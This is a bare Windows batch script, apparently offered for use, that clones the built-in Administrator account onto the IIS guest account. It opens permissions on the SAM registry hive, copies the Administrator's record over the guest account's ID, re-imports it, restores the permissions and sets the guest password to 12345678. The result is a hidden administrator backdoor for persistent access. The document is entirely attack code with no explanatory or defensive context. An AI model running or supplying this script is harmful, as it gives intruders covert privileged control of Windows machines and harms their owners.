echo off setlocal enabledelayedexpansion echo %computername% echo HKEY_LOCAL_MACHINE\SAM\SAM [1 17] >"%windir%\..\1.reg" regini "%windir%\..\1.reg" regedit /e "%windir%\..\1.reg" HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\IUSR_%computername% rem unicode ->ascii type "%windir%\..\1.reg" >"%windir%\..\2.reg" del /q "%windir%\..\1.reg" rem find IUSR_%computername% 的對應id for /F "delims=( tokens=1-5* skip=3" %%a in (%windir%\..\2.reg) do set iusr_id=%%b del /q "%windir%\..\2.reg" rem export administrator register regedit /e "%windir%\..\1.reg" HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4 type "%windir%\..\1.reg" >"%windir%\..\2.reg" del /q "%windir%\..\1.reg" rem replace 1fx->iusr_id for /f "tokens=* delims=:" %%i in (%windir%\..\2.reg) do ( for /f "tokens=*" %%j in ("%%i") do ( set TMP=%%j set "TMP=!TMP:000001F4=00000%iusr_id:~0,3%!" echo !TMP!>>%windir%\..\1.reg ) ) regedit /s %windir%\..\1.reg del /q %windir%\..\1.reg del /q %windir%\..\2.reg echo HKEY_LOCAL_MACHINE\SAM\SAM [17] >"%windir%\..\1.reg" regini "%windir%\..\1.reg" del /q "%windir%\..\1.reg" net user IUSR_%computername% 12345678